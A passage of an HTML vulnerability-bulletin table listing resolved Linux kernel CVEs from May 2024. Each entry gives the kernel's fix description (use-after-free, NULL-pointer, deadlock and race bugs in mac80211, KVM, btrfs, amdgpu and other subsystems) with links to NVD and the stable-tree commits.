<td>In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: check/clear fast rx for non-4addr sta VLAN changes When moving a station out of a VLAN and deleting the VLAN afterwards, the fast_rx entry still holds a pointer to the VLAN's netdev, which can cause use-after-free bugs. Fix this by immediately calling ieee80211_check_fast_rx after the VLAN change.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35789" target="_blank">CVE-2024-35789</a><br><a href="https://git.kernel.org/stable/c/2884a50f52313a7a911de3afcad065ddbb3d78fc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4f2bdb3c5e3189297e156b3ff84b140423d64685" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6b948b54c8bd620725e0c906e44b10c0b13087a7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7eeabcea79b67cc29563e6a9a5c81f9e2c664d5b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/be1dd9254fc115321d6fbee042026d42afc8d931" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c8bddbd91bc8e42c961a5e2cec20ab879f21100f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e8678551c0243f799b4859448781cbec1bd6f1cb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e8b067c4058c0121ac8ca71559df8e2e08ff1a7e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ea9a0cfc07a7d3601cc680718d9cff0d6927a921" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb: typec: altmodes/displayport: create sysfs nodes as driver's default device attribute group The DisplayPort driver's sysfs nodes may be present to the userspace before typec_altmode_set_drvdata() completes in dp_altmode_probe. This means that a sysfs read can trigger a NULL pointer error by deferencing dp-&gt;hpd in hpd_show or dp-&gt;lock in pin_assignment_show, as dev_get_drvdata() returns NULL in those cases. Remove manual sysfs node creation in favor of adding attribute group as default for devices bound to the driver. The ATTRIBUTE_GROUPS() macro is not used here otherwise the path to the sysfs nodes is no longer compliant with the ABI.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35790" target="_blank">CVE-2024-35790</a><br><a href="https://git.kernel.org/stable/c/0ad011776c057ce881b7fd6d8c79ecd459c087e9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/165376f6b23e9a779850e750fb2eb06622e5a531" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4a22aeac24d0d5f26ba741408e8b5a4be6dc5dc0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Flush pages under kvm-&gt;lock to fix UAF in svm_register_enc_region() Do the cache flush of converted pages in svm_register_enc_region() before dropping kvm-&gt;lock to fix use-after-free issues where region and/or its array of pages could be freed by a different task, e.g. if userspace has __unregister_enc_region_locked() already queued up for the region. Note, the "obvious" alternative of using local variables doesn't fully resolve the bug, as region-&gt;pages is also dynamically allocated. I.e. the region structure itself would be fine, but region-&gt;pages could be freed. Flushing multiple pages under kvm-&gt;lock is unfortunate, but the entire flow is a rare slow path, and the manual flush is only needed on CPUs that lack coherency for encrypted memory.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35791" target="_blank">CVE-2024-35791</a><br><a href="https://git.kernel.org/stable/c/12f8e32a5a389a5d58afc67728c76e61beee1ad4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2d13b79640b147bd77c34a5998533b2021a4122d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4868c0ecdb6cfde7c70cf478c46e06bb9c7e5865" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5ef1d8c1ddbf696e47b226e11888eaf8d9e8e807" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e126b508ed2e616d679d85fca2fbe77bb48bbdd7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f6d53d8a2617dd58c89171a6b9610c470ebda38a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: crypto: rk3288 - Fix use after free in unprepare The unprepare call must be carried out before the finalize call as the latter can free the request.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35792" target="_blank">CVE-2024-35792</a><br><a href="https://git.kernel.org/stable/c/48dd260fdb728eda4a246f635d1325e82f0d3555" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c0afb6b88fbbc177fa322a835f874be217bffe45" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eb2a41a8ae8c8c4f68aef3bd94665c0cf23e04be" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: debugfs: fix wait/cancellation handling during remove Ben Greear further reports deadlocks during concurrent debugfs remove while files are being accessed, even though the code in question now uses debugfs cancellations. Turns out that despite all the review on the locking, we missed completely that the logic is wrong: if the refcount hits zero we can finish (and need not wait for the completion), but if it doesn't we have to trigger all the cancellations. As written, we can _never_ get into the loop triggering the cancellations. Fix this, and explain it better while at it.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35793" target="_blank">CVE-2024-35793</a><br><a href="https://git.kernel.org/stable/c/3d08cca5fd0aabb62b7015067ab40913b33da906" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/952c3fce297f12c7ff59380adb66b564e2bc9b64" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e88b5ae01901c4a655a53158397746334778a57b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: dm-raid: really frozen sync_thread during suspend 1) commit f52f5c71f3d4 ("md: fix stopping sync thread") remove MD_RECOVERY_FROZEN from __md_stop_writes() and doesn't realize that dm-raid relies on __md_stop_writes() to frozen sync_thread indirectly. Fix this problem by adding MD_RECOVERY_FROZEN in md_stop_writes(), and since stop_sync_thread() is only used for dm-raid in this case, also move stop_sync_thread() to md_stop_writes(). 2) The flag MD_RECOVERY_FROZEN doesn't mean that sync thread is frozen, it only prevent new sync_thread to start, and it can't stop the running sync thread; In order to frozen sync_thread, after seting the flag, stop_sync_thread() should be used. 3) The flag MD_RECOVERY_FROZEN doesn't mean that writes are stopped, use it as condition for md_stop_writes() in raid_postsuspend() doesn't look correct. Consider that reentrant stop_sync_thread() do nothing, always call md_stop_writes() in raid_postsuspend(). 4) raid_message can set/clear the flag MD_RECOVERY_FROZEN at anytime, and if MD_RECOVERY_FROZEN is cleared while the array is suspended, new sync_thread can start unexpected. Fix this by disallow raid_message() to change sync_thread status during suspend. Note that after commit f52f5c71f3d4 ("md: fix stopping sync thread"), the test shell/lvconvert-raid-reshape.sh start to hang in stop_sync_thread(), and with previous fixes, the test won't hang there anymore, however, the test will still fail and complain that ext4 is corrupted. And with this patch, the test won't hang due to stop_sync_thread() or fail due to ext4 is corrupted anymore. However, there is still a deadlock related to dm-raid456 that will be fixed in following patches.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35794" target="_blank">CVE-2024-35794</a><br><a href="https://git.kernel.org/stable/c/16c4770c75b1223998adbeb7286f9a15c65fba73" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/af916cb66a80597f3523bc85812e790bcdcfd62b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eaa8fc9b092837cf2c754bde1a15d784ce9a85ab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix deadlock while reading mqd from debugfs An errant disk backup on my desktop got into debugfs and triggered the following deadlock scenario in the amdgpu debugfs files. The machine also hard-resets immediately after those lines are printed (although I wasn't able to reproduce that part when reading by hand): [ 1318.016074][ T1082] ====================================================== [ 1318.016607][ T1082] WARNING: possible circular locking dependency detected [ 1318.017107][ T1082] 6.8.0-rc7-00015-ge0c8221b72c0 #17 Not tainted [ 1318.017598][ T1082] ------------------------------------------------------ [ 1318.018096][ T1082] tar/1082 is trying to acquire lock: [ 1318.018585][ T1082] ffff98c44175d6a0 (&amp;mm-&gt;mmap_lock){++++}-{3:3}, at: __might_fault+0x40/0x80 [ 1318.019084][ T1082] [ 1318.019084][ T1082] but task is already holding lock: [ 1318.020052][ T1082] ffff98c4c13f55f8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: amdgpu_debugfs_mqd_read+0x6a/0x250 [amdgpu] [ 1318.020607][ T1082] [ 1318.020607][ T1082] which lock already depends on the new lock. [ 1318.020607][ T1082] [ 1318.022081][ T1082] [ 1318.022081][ T1082] the existing dependency chain (in reverse order) is: [ 1318.023083][ T1082] [ 1318.023083][ T1082] -&gt; #2 (reservation_ww_class_mutex){+.+.}-{3:3}: [ 1318.024114][ T1082] __ww_mutex_lock.constprop.0+0xe0/0x12f0 [ 1318.024639][ T1082] ww_mutex_lock+0x32/0x90 [ 1318.025161][ T1082] dma_resv_lockdep+0x18a/0x330 [ 1318.025683][ T1082] do_one_initcall+0x6a/0x350 [ 1318.026210][ T1082] kernel_init_freeable+0x1a3/0x310 [ 1318.026728][ T1082] kernel_init+0x15/0x1a0 [ 1318.027242][ T1082] ret_from_fork+0x2c/0x40 [ 1318.027759][ T1082] ret_from_fork_asm+0x11/0x20 [ 1318.028281][ T1082] [ 1318.028281][ T1082] -&gt; #1 (reservation_ww_class_acquire){+.+.}-{0:0}: [ 1318.029297][ T1082] dma_resv_lockdep+0x16c/0x330 [ 1318.029790][ T1082] do_one_initcall+0x6a/0x350 [ 1318.030263][ T1082] kernel_init_freeable+0x1a3/0x310 [ 1318.030722][ T1082] kernel_init+0x15/0x1a0 [ 1318.031168][ T1082] ret_from_fork+0x2c/0x40 [ 1318.031598][ T1082] ret_from_fork_asm+0x11/0x20 [ 1318.032011][ T1082] [ 1318.032011][ T1082] -&gt; #0 (&amp;mm-&gt;mmap_lock){++++}-{3:3}: [ 1318.032778][ T1082] __lock_acquire+0x14bf/0x2680 [ 1318.033141][ T1082] lock_acquire+0xcd/0x2c0 [ 1318.033487][ T1082] __might_fault+0x58/0x80 [ 1318.033814][ T1082] amdgpu_debugfs_mqd_read+0x103/0x250 [amdgpu] [ 1318.034181][ T1082] full_proxy_read+0x55/0x80 [ 1318.034487][ T1082] vfs_read+0xa7/0x360 [ 1318.034788][ T1082] ksys_read+0x70/0xf0 [ 1318.035085][ T1082] do_syscall_64+0x94/0x180 [ 1318.035375][ T1082] entry_SYSCALL_64_after_hwframe+0x46/0x4e [ 1318.035664][ T1082] [ 1318.035664][ T1082] other info that might help us debug this: [ 1318.035664][ T1082] [ 1318.036487][ T1082] Chain exists of: [ 1318.036487][ T1082] &amp;mm-&gt;mmap_lock --&gt; reservation_ww_class_acquire --&gt; reservation_ww_class_mutex [ 1318.036487][ T1082] [ 1318.037310][ T1082] Possible unsafe locking scenario: [ 1318.037310][ T1082] [ 1318.037838][ T1082] CPU0 CPU1 [ 1318.038101][ T1082] ---- ---- [ 1318.038350][ T1082] lock(reservation_ww_class_mutex); [ 1318.038590][ T1082] lock(reservation_ww_class_acquire); [ 1318.038839][ T1082] lock(reservation_ww_class_mutex); [ 1318.039083][ T1082] rlock(&amp;mm-&gt;mmap_lock); [ 1318.039328][ T1082] [ 1318.039328][ T1082] *** DEADLOCK *** [ 1318.039328][ T1082] [ 1318.040029][ T1082] 1 lock held by tar/1082: [ 1318.040259][ T1082] #0: ffff98c4c13f55f8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: amdgpu_debugfs_mqd_read+0x6a/0x250 [amdgpu] [ 1318.040560][ T1082] [ 1318.040560][ T1082] stack backtrace: [ ---truncated---</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35795" target="_blank">CVE-2024-35795</a><br><a href="https://git.kernel.org/stable/c/197f6d6987c55860f6eea1c93e4f800c59078874" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4687e3c6ee877ee25e57b984eca00be53b9a8db5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8678b1060ae2b75feb60b87e5b75e17374e3c1c5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8b03556da6e576c62664b6cd01809e4a09d53b5b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: ll_temac: platform_get_resource replaced by wrong function The function platform_get_resource was replaced with devm_platform_ioremap_resource_byname and is called using 0 as name. This eventually ends up in platform_get_resource_byname in the call stack, where it causes a null pointer in strcmp. if (type == resource_type(r) &amp;&amp; !strcmp(r-&gt;name, name)) It should have been replaced with devm_platform_ioremap_resource.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35796" target="_blank">CVE-2024-35796</a><br><a href="https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mm: cachestat: fix two shmem bugs When cachestat on shmem races with swapping and invalidation, there are two possible bugs: 1) A swapin error can have resulted in a poisoned swap entry in the shmem inode's xarray. Calling get_shadow_from_swap_cache() on it will result in an out-of-bounds access to swapper_spaces[]. Validate the entry with non_swap_entry() before going further. 2) When we find a valid swap entry in the shmem's inode, the shadow entry in the swapcache might not exist yet: swap IO is still in progress and we're before __remove_mapping; swapin, invalidation, or swapoff have removed the shadow from swapcache after we saw the shmem swap entry. This will send a NULL to workingset_test_recent(). The latter purely operates on pointer bits, so it won't crash - node 0, memcg ID 0, eviction timestamp 0, etc. are all valid inputs - but it's a bogus test. In theory that could result in a false "recently evicted" count. Such a false positive wouldn't be the end of the world. But for code clarity and (future) robustness, be explicit about this case. Bail on get_shadow_from_swap_cache() returning NULL.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35797" target="_blank">CVE-2024-35797</a><br><a href="https://git.kernel.org/stable/c/24a0e73d544439bb9329fbbafac44299e548a677" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b79f9e1ff27c994a4c452235ba09e672ec698e23" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d5d39c707a4cf0bcc84680178677b97aa2cb2627" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d962f6c583458037dc7e529659b2b02b9dd3d94b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race in read_extent_buffer_pages() There are reports from tree-checker that detects corrupted nodes, without any obvious pattern so possibly an overwrite in memory. After some debugging it turns out there's a race when reading an extent buffer the uptodate status can be missed. To prevent concurrent reads for the same extent buffer, read_extent_buffer_pages() performs these checks: /* (1) */ if (test_bit(EXTENT_BUFFER_UPTODATE, &amp;eb-&gt;bflags)) return 0; /* (2) */ if (test_and_set_bit(EXTENT_BUFFER_READING, &amp;eb-&gt;bflags)) goto done; At this point, it seems safe to start the actual read operation. Once that completes, end_bbio_meta_read() does /* (3) */ set_extent_buffer_uptodate(eb); /* (4) */ clear_bit(EXTENT_BUFFER_READING, &amp;eb-&gt;bflags); Normally, this is enough to ensure only one read happens, and all other callers wait for it to finish before returning. Unfortunately, there is a racey interleaving: Thread A | Thread B | Thread C ---------+----------+--------- (1) | | | (1) | (2) | | (3) | | (4) | | | (2) | | | (1) When this happens, thread B kicks of an unnecessary read. Worse, thread C will see UPTODATE set and return immediately, while the read from thread B is still in progress. This race could result in tree-checker errors like this as the extent buffer is concurrently modified: BTRFS critical (device dm-0): corrupted node, root=256 block=8550954455682405139 owner mismatch, have 11858205567642294356 expect [256, 18446744073709551360] Fix it by testing UPTODATE again after setting the READING bit, and if it's been set, skip the unnecessary read. [ minor update of changelog ]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35798" target="_blank">CVE-2024-35798</a><br><a href="https://git.kernel.org/stable/c/0427c8ef8bbb7f304de42ef51d69c960e165e052" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2885d54af2c2e1d910e20d5c8045bae40e02fbc1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3a25878a3378adce5d846300c9570f15aa7f7a80" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ef1e68236b9153c27cb7cf29ead0c532870d4215" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Prevent crash when disable stream [Why] Disabling stream encoder invokes a function that no longer exists. [How] Check if the function declaration is NULL in disable stream encoder.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35799" target="_blank">CVE-2024-35799</a><br><a href="https://git.kernel.org/stable/c/2b17133a0a2e0e111803124dad09e803718d4a48" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4356a2c3f296503c8b420ae8adece053960a9f06" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/59772327d439874095516673b4b30c48bd83ca38" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/72d72e8fddbcd6c98e1b02d32cf6f2b04e10bd1c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: efi: fix panic in kdump kernel Check if get_next_variable() is actually valid pointer before calling it. In kdump kernel this method is set to NULL that causes panic during the kexec-ed kernel boot. Tested with QEMU and OVMF firmware.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35800" target="_blank">CVE-2024-35800</a><br><a href="https://git.kernel.org/stable/c/090d2b4515ade379cd592fbc8931344945978210" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/62b71cd73d41ddac6b1760402bbe8c4932e23531" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7784135f134c13af17d9ffb39a57db8500bc60ff" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9114ba9987506bcfbb454f6e68558d68cb1abbde" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b9d103aca85f082a343b222493f3cab1219aaaf4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Keep xfd_state in sync with MSR_IA32_XFD Commit 672365477ae8 ("x86/fpu: Update XFD state where required") and commit 8bf26758ca96 ("x86/fpu: Add XFD state to fpstate") introduced a per CPU variable xfd_state to keep the MSR_IA32_XFD value cached, in order to avoid unnecessary writes to the MSR. On CPU hotplug MSR_IA32_XFD is reset to the init_fpstate.xfd, which wipes out any stale state. But the per CPU cached xfd value is not reset, which brings them out of sync. As a consequence a subsequent xfd_update_state() might fail to update the MSR which in turn can result in XRSTOR raising a #NM in kernel space, which crashes the kernel. To fix this, introduce xfd_set_state() to write xfd_state together with MSR_IA32_XFD, and use it in all places that set MSR_IA32_XFD.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35801" target="_blank">CVE-2024-35801</a><br><a href="https://git.kernel.org/stable/c/10e4b5166df9ff7a2d5316138ca668b42d004422" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1acbca933313aa866e39996904c9aca4d435c4cd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/21c7c00dae55cb0e3810d5f9506b58f68475d41d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/92b0f04e937665bde5768f3fcc622dcce44413d8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b61e3b7055ac6edee4be071c52f48c26472d2624" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: x86/sev: Fix position dependent variable references in startup code The early startup code executes from a 1:1 mapping of memory, which differs from the mapping that the code was linked and/or relocated to run at. The latter mapping is not active yet at this point, and so symbol references that rely on it will fault. Given that the core kernel is built without -fPIC, symbol references are typically emitted as absolute, and so any such references occuring in the early startup code will therefore crash the kernel. While an attempt was made to work around this for the early SEV/SME startup code, by forcing RIP-relative addressing for certain global SEV/SME variables via inline assembly (see snp_cpuid_get_table() for example), RIP-relative addressing must be pervasively enforced for SEV/SME global variables when accessed prior to page table fixups. __startup_64() already handles this issue for select non-SEV/SME global variables using fixup_pointer(), which adjusts the pointer relative to a `physaddr` argument. To avoid having to pass around this `physaddr` argument across all functions needing to apply pointer fixups, introduce a macro RIP_RELATIVE_REF() which generates a RIP-relative reference to a given global variable. It is used where necessary to force RIP-relative accesses to global variables. For backporting purposes, this patch makes no attempt at cleaning up other occurrences of this pattern, involving either inline asm or fixup_pointer(). Those will be addressed later. [ bp: Call it "rip_rel_ref" everywhere like other code shortens "rIP-relative reference" and make the asm wrapper __always_inline. ]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35802" target="_blank">CVE-2024-35802</a><br><a href="https://git.kernel.org/stable/c/0982fd6bf0b822876f2e93ec782c4c28a3f85535" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1c811d403afd73f04bde82b83b24c754011bd0e8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/66fa3fcb474b2b892fe42d455a6f7ec5aaa98fb9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/954a4a87814465ad61cc97c1cd3de1525baaaf07" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fe272b61506bb1534922ef07aa165fd3c37a6a90" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: x86/efistub: Call mixed mode boot services on the firmware's stack Normally, the EFI stub calls into the EFI boot services using the stack that was live when the stub was entered. According to the UEFI spec, this stack needs to be at least 128k in size - this might seem large but all asynchronous processing and event handling in EFI runs from the same stack and so quite a lot of space may be used in practice. In mixed mode, the situation is a bit different: the bootloader calls the 32-bit EFI stub entry point, which calls the decompressor's 32-bit entry point, where the boot stack is set up, using a fixed allocation of 16k. This stack is still in use when the EFI stub is started in 64-bit mode, and so all calls back into the EFI firmware will be using the decompressor's limited boot stack. Due to the placement of the boot stack right after the boot heap, any stack overruns have gone unnoticed. However, commit 5c4feadb0011983b ("x86/decompressor: Move global symbol references to C code") moved the definition of the boot heap into C code, and now the boot stack is placed right at the base of BSS, where any overruns will corrupt the end of the .data section. While it would be possible to work around this by increasing the size of the boot stack, doing so would affect all x86 systems, and mixed mode systems are a tiny (and shrinking) fraction of the x86 installed base. So instead, record the firmware stack pointer value when entering from the 32-bit firmware, and switch to this stack every time a EFI boot service call is made.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35803" target="_blank">CVE-2024-35803</a><br><a href="https://git.kernel.org/stable/c/2149f8a56e2ed345c7a4d022a79f6b8fc53ae926" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/725351c036452b7db5771a7bed783564bc4b99cc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/930775060ca348b8665f60eef14b204172d14f31" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cefcd4fe2e3aaf792c14c9e56dab89e3d7a65d02" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fba7ee7187581b5bc222003e73e2592b398bb06d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Mark target gfn of emulated atomic instruction as dirty When emulating an atomic access on behalf of the guest, mark the target gfn dirty if the CMPXCHG by KVM is attempted and doesn't fault. This fixes a bug where KVM effectively corrupts guest memory during live migration by writing to guest memory without informing userspace that the page is dirty. Marking the page dirty got unintentionally dropped when KVM's emulated CMPXCHG was converted to do a user access. Before that, KVM explicitly mapped the guest page into kernel memory, and marked the page dirty during the unmap phase. Mark the page dirty even if the CMPXCHG fails, as the old data is written back on failure, i.e. the page is still written. The value written is guaranteed to be the same because the operation is atomic, but KVM's ABI is that all writes are dirty logged regardless of the value written. And more importantly, that's what KVM did before the buggy commit. Huge kudos to the folks on the Cc list (and many others), who did all the actual work of triaging and debugging. base-commit: 6769ea8da8a93ed4630f1ce64df6aafcaabfce64</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
